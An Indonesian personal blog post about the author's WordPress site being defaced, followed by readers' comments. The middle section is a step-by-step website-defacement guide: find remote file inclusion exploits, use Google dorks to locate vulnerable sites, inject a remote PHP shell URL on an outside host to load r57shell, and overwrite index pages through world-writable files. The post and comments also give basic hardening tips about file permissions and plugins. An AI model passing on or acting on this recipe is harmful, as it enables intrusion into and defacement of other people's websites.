IncredibleAngga.com disusupi
Hari sabtu tanggal 16 Mei si Angga Kusuma Nugraha, mengikuti ujian tengah semester mata kuliah Oracle DBA and form developer. Lagi mentok2 nya otak, iseng buka blog sendiri tapi tampilan nya kok gini
klik gambar untuk memperbesar
Waks.. ada yang menyusupi blog ini..!!!! akhirnya dengan sedikit usaha akhirnya blog ini pulih dalam beberapa jam, walau sampai hari senin bandwidht masih belum bisa di stabilkan.
Perlakuan seperti ini pada suatu website disebut “deface” bagai mana caranya? diriku sedikit googling dan mempraktekan nya. Ternyata ngak begitu sulit loh.
Berikut ini cara yang diambil dari salah satu website dan diriku praktekkan (ngak bakal dibahas secara rinci karena hal ini berbahaya jika disalahgunakan)
1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan biasanya adalah salah Relative Path dari Site tersebut, atau memang beda versi, tentu ada kemungkinan lain.
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error.
13. Ganti command exploit setelah tanda ‘=‘[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw ( untuk file ) dan drwxrwxrwx / drw-rw-rw ( untuk direktory)
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama-mana decoding dikibarkan disana…
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi. Klo berhasil akan keluar seperti yang kita inginkan
Nah.. dari cara-cara diatas, yang bisa diambil pelajaran adalah hati2 dengan hak akses di file2-mu, sebisa mungkin jangan ada yang memiliki chmod bernilai 777 yang biasanya pada wordpress berada pada masalah plugins yang tidak bagus.
Sampai saat ini sebenernya blog ini masih dalam pengujian keamanan, ada yang mau bantu?
Article by aNGga Labyrinth™ special thanx to Ridhoyp *yang udah membantu pulihnya blog ini*
Related Article
May 20th, 2009 at 22:52
wah untungnya segera pulih..
berarti celah itu emang default wordpress atau dari hosting atau sebab lain?
edy’s last blog post.. » Bicara UU ITE
Jawab:
Penyebabnya bukan wrdpress nya mas, tapi klo diriku kena dari plugins
dan namagemen file yang serampangan
May 21st, 2009 at 00:54
sejujurnya aku ndak ngerti, ga XDDD
haduh, bahasanya susah bgt…
macangadungan’s last blog post.. » Gue Bukan Cowok… Maap ya… Hehehehe….
Jawab:
Hmm…. ya sudahlah klo ngak ngerti
hati2 saja, rajin backup
May 21st, 2009 at 06:58
Sama kayak macangadungan, ga begitu ngerti Ngga.. Tapi syukurlah dah pulih kembali.. Jadi gimana cara mencegahnya Ngga? Ga boleh chmod 777 ya?
Ade’s last blog post.. » Ngebuuut.. *extended version*
Jawab:
Yaa… sebiasa mungkin gitu uni, chmod itu yang bikin riskan
jangan lupa hapus file readme.html dan lisence.txt yang default dari wordpress uni
May 21st, 2009 at 07:51
sama kaya fathi donk yaa
Jawab:
Yup.. satu server pula kan kita
May 21st, 2009 at 08:08
Wah sekolah apaan sich, kok keren gitu keknya..
Ga kayak diriku yang Gaptek dech……
Joko Setiawan’s last blog post.. » SEDIKIT BERBAGI FOTO-FOTO MUDIK KEMARIN
Jawab:
Anooo…. dengan bangga diriku bakal bilang UNIVERSITAS BUDI LUHUR
he he he….
May 21st, 2009 at 09:03
wah..kok bisa kena deface ya
jadi takut nih
Jawab:
Wa ha ha… itu mah karena keteledoran diriku aja kk
ngak usah takut
May 21st, 2009 at 10:11
gak mau komentar ah…ngeri..kwwkkwkwkkwk,, biasanya hole nya ada di plugin WP nya ngga…itu kata-kata indah (coding) sang defacer ditaro dimana ngga??
Piss ya kaka-kaka yang baca…^^
Kus Andriadi’s last blog post.. » wew…berat gw naek jadi 76KG!!!!
Jawab:
Iya, diriku juga kena dari plugins.. bukan dari WP nya
script nya di taro di salah satu directory (rahasia)
May 21st, 2009 at 10:40
wah, klo soal permission doang, simpel tapi berbahaya…
diliat lagi tuh, ownernya ,ngga….
tapi untungnya bisa cepet balik lagi yah…
congratz yah..udah di hack..haahaha
aRieF do0n9™’s last blog post.. » I Love U, Jaunty
Jawab:
KURANG AJAR…!!!! masa di hack di kasih selamat
tapi ambil hikmahnya aja sih, gw jadi lebih sadar keamanan
May 21st, 2009 at 12:59
wahh blognya kena deface..
gmn cara mulihinnya bro?
fanad’s last blog post.. » Teman Tapi Mesra Versi English
Jawab:
Yang paling gampang ya, bersihin seisi storage hosting trus upload lagi backup kita
May 21st, 2009 at 13:12
wkwkwkwkwk….
selamat deh ngga…
dapet BONUS…
Rizkeyboard’s last blog post.. » Jalan – jalan ke HP
Jawab:
Iya cba gw cerita k pak goen ya
May 21st, 2009 at 13:14
kalo cara mbenerinnya gimana tuh?
kan td cuman diterangin cara nge-defacenya
shelila’s last blog post.. » Maling ber-CD bukan maling CD!
Jawab:
Sebenernya kita bisa cari script2 yang dia tanem di storage kita dan hapus, trus benerin file management
tapi klo diriku sikat aja smua, hapus…!!!! trus upload lagi backup nya he he he… jadi ngak repot nyari2
May 21st, 2009 at 15:40
Ngeri juga yah sob ..
Pixel’s last blog post.. » CUSTOM DOMAIN BLOGGER
Jawab:
Iya..
May 21st, 2009 at 20:07
kok ada yg iseng nge-hack disini sih, ngga..?! Thank God you can handle it well
Jawab:
Iya kk, untung bisa kembali pulih
May 21st, 2009 at 20:09
jadi karena itu mendadak ada security codenya?
ian’s last blog post.. » Blogvertise juga nerima bahasa Indonesia
Jawab:
Security code udah sejak sebulan yang lau kk, itu karena diriku ngak tahan dengan hampir 100 spam setiap hari yang nawarin viagra
lagian captcha itu g bisa ngalangin defacer
May 22nd, 2009 at 00:48
omigod… apaan inih? *ndak ngerti*
Jawab:
He he he… cma ngomong ngak jelas juga sih
May 22nd, 2009 at 02:34
info bagus …
urusan deface itu urusan niat … kalau memang sudah niatan jelek cara apapun dilakukan … sasaranpun tidak pilih-pilih lagi …
memang urusan keamanan situs seharusnya termasuk hal wajib yg perlu diperhatikan … tetapi seberapa banyak dari sekian juta blogger yg memahami hal ini … secara default, blog khususnya wp sudah cukup aman, tetapi kita seringkali tergoda untuk menambahkan berbagai fitur … baik berupa plugin maupun widget sehingga hanya menambah celah saja …
/* saya ini hanya omong doang ya
… blog saya sendiri masih jauh dari aman … pusing … apalagi hosting gratisan gak bisa semaunya config …
… salam kenal mas Angga … */
nomercy’s last blog post.. » Screenshot hasil tes Acid3 untuk browser Mozilla Firefox 3.5b4 platform Linux
Jawab:
Wah… bener banget tuh, salam kenal juga kk
May 22nd, 2009 at 10:30
wow…
*segera periksa chmod…huhuhuhuh
Jawab:
Ha ha ha… makasih udah berkunjung kk
May 22nd, 2009 at 10:43
doch kok bisa disusupi ju9a yakh
ummm kudu ati ati neeh yah an99a…
alhamdulilah suda pulih la9i
Search the Web on Snap.com’s last blog post.. » ~ LuPa Tap! in9aT ~
Jawab:
iya kk, untung udah pulih lagi
mesti lebih hati2 nih…
May 22nd, 2009 at 16:22
gak mau nyoba ah… takut di eksplotasi sama orang yang punya ntar. hehehe…
btw, turut berduka cita atas meninggalnya… kucing tetangga gw
*sori OOT*
Mr. Handsome’s last blog post.. » HOT NEWS! Mantan Presiden Bush Bicara Bahasa Jawa…
Jawab
Ha ha ha… saya juga turut berduka cita…
poor cat..
May 22nd, 2009 at 18:44
untung cepet2 di dipulihkan ya? coba klo lagi gak buka blog.. bsa2 banyak pengunjung yang kaget tuh
Jawab:
ha ha ha… iya untung nya segera ketauan
kebetula pas saat itu juga anggie berkujugn kok, besoknya komen deh ha ha ha…
May 22nd, 2009 at 22:48
Inilah hal menyebalkan dan pernah terjadi pd saya.
Jawab
Ha ha ha… sesama korban ya kk
tapi sekarang udah pulih dong, g apa2 kk kan jadinya puna pengalaman
May 23rd, 2009 at 11:12
WALAH!!
Ko bisa om aNG???
emang ntu orang2 yg iseng, niatny mw ngapain sih..???
Jawab:
kk sendiri yang bilang orang iseng, ya niat nya iseng lah
ha ha ha….
May 24th, 2009 at 08:33
klo blog gw digituin..
waduh..bisa nangis gw karena ga ngerti gimana cara benerinnya lagi..
untung dah bener ya blog lo..
presy__L’s last blog post.. » Menunggu
Jawab:
Iya untung udah bener, klo wordpress kayaknya servernya udah secure deh
palingan harus ati2 jaga password
May 24th, 2009 at 10:44
Wah… nisa gak ngerti apa2 nihh soal beginiaaann… T_T
saya bantu doa aja ya mas…
SEMANGAAT mas
Nisa’s last blog post.. » ^_^ Kak…!!
Jawab:
Iya makasih do’a nya
Maaf ya komentarnya dijadiin satu
May 24th, 2009 at 17:37
iseng yg g asik tuh om aNG….
nyebelin kan??
iya kann iya dong bener kan bener donk..????
Jawab:
Ha ha ha… iya asok kali menurut dia nya
May 25th, 2009 at 09:13
Dulu salah satu forum yang saya ikuti kalau gak salah juga pernah kena kasus begini.
Sedikit bertanya, -rwxrwxrwx / -rw-rw-rw dkk itu, dimasukin dari command prompt? Masih bingung saya.
Disc-Co’s last blog post.. » Who Copy Who
Jawab:
yang kk maksud -rwxrwxrwx itu ngaturnya yang termudah dari file manager kk
ada option chmod namanya
May 25th, 2009 at 11:33
Deface mah banyak caranya kang.. gak cuma ini aja..
Btw, blog ini dimasuki lewat mana? Apa karena servernya gak aman jadi situs tetangga udah dimasukin Shell terus bisa tembus kesini?
Jawab:
Yups.. bener banget, banyak banget caranya. Kebeneran blog ini disusupi dengan cara seperti diatas
soal server diriku udah konfirm ke bagian hosting
dan kata bang aput katanya mo attack balikblog ini di masukin dari plugins kk
May 25th, 2009 at 12:51
whaha…
ada pencagahannya..
:: di sisi pemilik blog ::
1. password harus secure << pencegahan brute force
2. hilangkan wp-login.php << ada pluginnya..
3. hati – hati dengan plugin plugin baru.. periksa dulu scriptnya..
4. mereka masuk lewat login lalu mengedit bagian tamplate.. jadi tamplate mana pun jangan beri iziin untuk mengedit.. (permission 755/766/etc)
:: server ::
kapan kapan aja deh.. whehehehe..
Andri’s last blog post.. » Deddy Cobuzier Was Hacked
Jawab:
Kebeneran diriku bukan disusupi dengan cara brute force password gitu kk, tapi tetep seperti yang kk bilang sih. harus waspada
klo template karena diriku buat sendiri, seandainya di ssusupi script nya dia tinggal hapus aja satu folder dengan themes nya sekalian, trus ganti yang baru
makasih info nya kk
May 25th, 2009 at 16:31
777, kok jadi inget ngatur hak akses di linux ya.
mas stein’s last blog post.. » Apa Tujuan Sampeyan Ber-Facebook?
Jawab:
yups bener banget, kan servernya pake linux kk
May 26th, 2009 at 06:22
ckckck..
)
kamu ternyata anggota tim hacker ya, Ngga..?
tak ku duga tak ku sangka..
iya, Ngga.. diatur aja..
kalo 777, semua usernya dapet privilege rwx dong :-s
Jawab:
Wa ha ha… ngak sih, blom bisa dibilang hacker
iya kk, klo 777 semua dapat akses write, itu yang bahaya
May 27th, 2009 at 10:10
selamet ye,,,bisa memulihkan blognya lagi…
lagian ngapain sih orang itu ngisengin blognya angga??
hal yang aneh..
dHarto..!!’s last blog post.. » Dari Reuni ke Gathering
Jawab:
Yups.. bener banget bang darto, ngak ada web lain yang kerenan buat di isengin apa ya
cemen banget ngisengin blog
May 27th, 2009 at 11:50
Jahahaha,, gw ga ngerti sumpah
kgak bsa bntu dah gw,hakhak XD XD
Jawab:
Ha ha ha… maksih udah komen ya
May 27th, 2009 at 12:16
baru ajah dibahas ma dosen w tentang hacker….
serem juga nih..masalahnya w gaptek Ngga..
untung u nggak gaptek yah..
keren bgt deh lu…
I like…
kenanga’s last blog post.. » Adilkah Ini?
Jawab:
Hmm…. kebeneran aja ini bidang gw, jadi ya.. klo oarang yang bukan bidangnya ngak bisa dibilang gaptek juga sih
I like too…
June 1st, 2009 at 15:46
parah ih…
untung kembali tuw blog !
Jiyy’s last blog post.. » Finally…
Jawab:
Iya untung aja bisa balik lagi
makasih atas kunjungan nya
July 20th, 2009 at 21:27
hahahaha.. mantab neh..
btw maenan deface bahaya lo, harus ready lahir batin.. tau2 yang di deface ternyata web pemerintah/web orang berduit. bisa bahaya. *pengalaman pribadi..
kwkwkwkwkw..
btw saluth..
Jawab:
Ini ceritanya saya yang jadi korban loh kk
August 1st, 2009 at 10:37
bos, yang bisa kena RFI plugin apa?boleh tau?sapa tau gw jg pake plugin itu…thx bro…
Jawab:
Waduh… takut ah ngomong disini, cek email kk
dna kemungkinan ngak cma 1 plugins itu aja, banyak loh yang beredar di luar sana
untuk mengecek nya, coba pake “wp security scan” dari sana kita bisa tau celah plugins dan lain2
gratis kok